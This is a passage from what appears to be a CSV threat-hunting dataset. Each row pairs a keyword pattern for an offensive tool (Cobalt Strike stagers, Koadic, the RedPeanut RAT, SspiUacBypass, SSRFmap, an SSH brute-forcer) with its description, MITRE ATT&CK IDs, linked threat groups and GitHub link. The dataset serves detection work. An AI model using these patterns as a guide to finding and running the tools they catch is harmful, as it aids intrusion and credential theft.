Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*ssh-putty-brute -*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an 
SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*ssh-putty-brute.ps1*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*SSH-PuTTY-login-bruteforcer*","offensive_tool_keyword","SSH-PuTTY-login-bruteforcer","Turn PuTTY into an SSH login bruteforcing tool.","T1110.002 - T1059.003 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/InfosecMatter/SSH-PuTTY-login-bruteforcer","1","1","N/A","9","3","255","81","2020-11-21T07:10:26Z","2020-04-25T07:20:14Z" +"*sshuttle -r *0.0.0.0/24*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*sslstrip*","offensive_tool_keyword","sslstrip","sslstrip is a MITM tool that implements Moxie Marlinspikes SSL stripping attacks.","T1557.001 - T1573 - T1559 - T1542 - T1552","TA0002 - TA0011 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/moxie0/sslstrip","1","1","N/A","N/A","10","1821","418","2021-05-29T01:53:12Z","2011-04-24T06:40:08Z" +"*SspiUacBypass.cpp*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass.exe*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SspiUacBypass-main*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*SSploitEnumeration*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitEnumerationDomain*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitExecution_DynamicInvoke*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitExecution_Injection*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net 
Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitLateralMovement*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitPersistence*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SSploitPrivilegeEscalation*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*sspr2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ssrf --gopher --encode --scan-action filter-bypass*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java 
RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*ssrfmap -r *.txt -p id -m readfiles*portscan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SSRFmap*","offensive_tool_keyword","SSRFmap","SSRF are often used to leverage actions on other services. this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.","T1210.001 - T1190 - T1191 - T1505 - T1213","TA0007 - TA0002 - TA0008 - TA0001","N/A","N/A","Web Attacks","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*ssrfmap.py*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*StackCrypt-main*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.cpp*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack 
then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.exe*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.sln*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*StackEncrypt.vcxproj*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*stage.obfuscate*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*stage_smartinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x64_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stageless payload*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*stager/js/bitsadmin *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/disk*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/mshta*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/regsvr *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/rundll32_js *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager/js/wmic *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 